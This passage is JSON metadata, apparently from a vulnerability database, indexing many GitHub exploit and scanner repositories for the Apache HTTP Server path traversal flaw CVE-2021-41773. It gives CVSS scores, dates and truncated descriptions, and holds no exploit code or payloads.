"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-03-27T21:54:06", "id": "3C5B500C-1858-5834-9D23-38DBE44AE969", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-20T00:21:12", "description": "\u7528\u4e8e\u68c0\u6d4b/\u5229\u7528Apache 2.4.49\u4e0e2.4.50\u4e0a\u7684\u76ee\u5f55\u7a7f\u8d8a/\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\n\n\n\u4f7f\u7528\uff1a\n\n\u6f0f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-10T10:09:52", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-11T04:09:16", "id": "9D511461-7D24-5402-8E2A-58364D6E758F", "href": "", 
"cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773\n\napache http server vulnerability (only works 2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T15:00:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-15T19:28:33", "id": "FF610CB4-801A-5D1D-9AC9-ADFC287C8482", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# POC CVE-2021-41773\n## \n\n[\n\nFor educational pur...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, 
"impactScore": 3.6}, "published": "2021-10-05T18:56:04", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-10T18:37:45", "id": "3AE03E90-26EC-5F91-B84E-F04AF6239A9F", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773\n\nHello guys, yesterday The new CVE-2021-41773 f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T12:30:13", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-10T18:36:13", "id": "A6753173-D2DC-54CC-A5C4-0751E61F0343", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-11-09T18:33:53", "description": "# Apachuk - CVE-2021-41773 Grabber with Shodan\nGrabber Apache Di...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-11T00:57:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-11-09T18:14:01", "id": "C8799CA3-C88C-5B39-B291-2895BE0D9133", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-11-15T18:22:02", "description": "# CVE-2021-41773\nThis is a sim...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": 
"NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-08T01:13:33", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-11-15T17:45:18", "id": "108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 \r\nPath Traversal in Apache HTTP Server 2.4.49\r\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T16:19:45", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", 
"integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-08T01:15:42", "id": "628A345B-5FD8-5A2F-8782-9125584E4C89", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 scanner\n### This script tests for the path t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-08T08:32:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-10T18:53:24", "id": "E9FE319B-26BF-5A75-8C6A-8AE55D7E7615", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-10-01T20:50:44", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 
3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-15T09:36:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-09-15T09:36:35", "id": "D10426F3-DF82-5439-AC3E-6CA0A1365A09", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-05-12T07:09:54", "description": "# CVE-2021-41773 Shodan scanner\nCVE-2021-41773 Shodan scanner vi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-12T03:42:24", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-05-12T03:42:49", "id": "E7B177F6-FA62-52FE-A108-4B8FC8112B7F", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-19T02:00:47", "description": "# CVE-2021-41773 ( Apache / 2.4.49 )\nCVE-2021-41773 exploit by G...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-04T16:19:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-08-04T16:33:22", "id": "DBF996C3-DC2A-5859-B767-6B2FC38F2185", "href": "", "cvss": {"score": 4.3, "vector": 
"AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-05-13T22:09:15", "description": "# CVE-2021-41773 Essay \ud83d\udd78\ufe0f\n\n## Description \ud83d\uddbc\ufe0f\n\nThis repository co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-12T13:23:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-05-13T15:02:27", "id": "749F952B-3ACF-56B2-809D-D66E756BE839", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-09-16T02:04:10", "description": "# CVE-2021-41773\n## \ud83d\udc1b Path traversal and file disclosure vulnera...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-15T12:37:59", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-09-16T01:01:18", "id": "674BA200-C494-57E6-B1B4-1672DDA15D3C", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-09-15T15:23:46", "description": "# CVE-2021-41773-PoC\nPoC for CVE-2021-41773 with docker to demon...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-15T11:01:45", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-09-15T11:02:07", "id": "B58E6202-6D04-5CB0-8529-59713C0E13B8", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-09-20T05:03:43", "description": "# CVE-2021-41773 - Apache HTTP Server 2.4.49\n\n# Cara Menjalankan...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-20T03:45:24", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-09-20T03:45:37", "id": "CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773-exercise\nA flaw was found in a change made to p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-26T11:02:46", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-01-26T11:22:13", "id": "FFE89CAE-FAA6-5E93-9994-B5F4D0EC2197", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-12T14:47:39", "description": "# CVE-2021-41773\nCVE-2021-41773 POC with Docker\n\n### Configurati...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T02:30:40", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-03-12T13:45:57", "id": "4E4BAF15-6430-514A-8679-5B9F03584B71", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-11-09T18:33:01", "description": "# CVE-2021-41773 PoC\n\nProof of concept to check if hosts are vul...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T17:30:43", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-11-09T18:13:57", "id": "789B6112-E84C-566E-89A7-82CC108EFCD9", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-29T22:34:44", "description": "# CVE-2021-41773\nPath traversal and file 
disclosure vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T23:53:48", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-07-29T10:40:45", "id": "27108E72-8DC1-53B5-97D9-E869CA13EFF7", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-01T21:44:38", "description": "# CVE-2021-41773\n\n[\n## \n\n[![N|So...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", 